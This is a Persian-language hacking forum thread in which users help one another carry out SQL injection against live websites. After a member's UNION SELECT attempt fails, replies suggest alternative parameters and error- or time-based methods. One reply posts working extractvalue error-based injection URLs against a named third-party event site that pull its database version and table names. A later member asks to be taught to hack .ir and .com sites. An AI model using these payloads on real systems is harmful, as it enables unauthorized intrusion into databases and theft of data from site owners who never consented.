رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

سلام خدمت اعضای محترم گارد ایران

من سایتی رو داشتم بایپس میکردم بعد از Union Select با ارور Data Base Query Failed The Used Select Statements Have A Diffrent Number Of Columns مواجه شدم اگر کسی از شیوه بایپسش مطلع هست ممنون میشم کمک کنه

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

درود

ببینید این ارور رو میشه از طریق بایپسهای عادی بایپس کرد اگه نشد از قسمت های دیگه سایت

خیلی ساده توضیح بدم :

1_ بایپس عادی

2_ اگه باگ سایتتون مثلا این قسمتش باشه news.php?id=

شما برید یک قسمت دیگه مثلا: index.php?id=

3_ارور بیس همیشه اینارو بایپس میکنه و همینطور تایم بیس ولی اگه یونیون منظورتون هست بایپس نشد تارگت رو بدید بررسی کنیم

:)

پیروز باشید .......

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

nightgallery.ca/event.php?id=91

تعداد ستون ها 10 تاست همون یونیون سلکت رو ارور میده

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

تارگت

به راحتی توسط xpath injection اینجکت میشه

http://nightgallery.ca/event.php?id=91 and extractvalue(rand(),concat(0x7e,(select @@version)))

تیبل نیم ها

http://nightgallery.ca/event.php?id=91 and extractvalue(rand(),concat(0x7e,(select table_name from information_schema.tables limit 0,1)))

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام به همه ی اعضا و مدیر گرامی ببخشید من یکی رو میشناسم سایتی رو که ir  و یا comهستش رو به راحتی میتونی هک کنه درعرض 41ثانیه اونم  التماسشم کردم گفتم یاد بده نداد بعد من برنامه اکانتکس چیه ریختم ولی اونم کلید مجوز و پورت هاست میخواد ونمیدونم چیکارکنم میخواستم اگه میشه اموزشم بدید مرسی ممنون امیرهستم

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام به همه ی اعضا و مدیر گرامی ببخشید من یکی رو میشناسم سایتی رو که ir  و یا comهستش رو به راحتی میتونی هک کنه درعرض 41ثانیه اونم  التماسشم کردم گفتم یاد بده نداد بعد من برنامه اکانتکس چیه ریختم ولی اونم کلید مجوز و پورت هاست میخواد ونمیدونم چیکارکنم میخواستم اگه میشه اموزشم بدید مرسی ممنون امیرهستم

درود

ببیند دیگه کشک که نیست هر سایت .ir یا .com رو هک کنه

اگر نه دیگه تا الان سایتی بالا نمیومد

بهش بگید خیلی گندهس بره اینو هک کنه

http://iau.ac.ir/

یا .com :

https://www.microsoft.com/en-us/

.

بعدشم تو بخش خودش سوالات رو بپرسید :)

پیروز باشید ..........

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...